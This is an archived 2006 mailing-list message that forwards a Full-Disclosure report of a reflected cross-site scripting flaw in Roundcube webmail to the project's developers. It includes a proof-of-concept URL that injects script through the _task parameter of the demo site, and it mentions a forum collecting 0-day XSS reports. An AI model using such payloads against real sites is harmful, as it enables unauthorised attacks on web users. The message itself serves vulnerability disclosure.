Fw: [Full-disclosure] XSS in roundcube.com and users of it

Chris Largret largret at gmail.com
Tue Nov 21 07:44:46 CET 2006


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey,

I'm sure others have seen this as it's a couple days old now, but I'm
just passing it along. It should have been sent to you guys first, but I
don't see a reference on the dev list and it still works.

- -Chris


Begin forwarded message:

Date: Sat, 11 Nov 2006 10:51:00 -0800
From: RSnake <h at ckers.org>
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] XSS in roundcube.com and users of it


There is an XSS vulnerability in roundcube webmail:

http://demo.roundcube.net/?_task=');alert(%22XSS%22)//

Btw, we've been posting 0-day XSS vulnerabilities at 
http://sla.ckers.org/forum/list.php?3 to take it out of the full 
disclosure list since lots of people don't want to see the sheer volume 
of reports.  We've got close to a thousand companies and counting.  
We're just trying to cut down on the noise to people's inboxes.  That
is all.

- -RSnake
http://ha.ckers.org
http://sla.ckers.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


- -- 
Chris Largret <http://www.largret.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFYqBuyBrDZUqad5ERAnXiAJ0Tg2JFCHj2EDXfV+5O94HBQiqaEwCfWcSl
Pk1XfZ72hbyNh1twaJI7Fec=
=N4Z8
-----END PGP SIGNATURE-----


More information about the Dev mailing list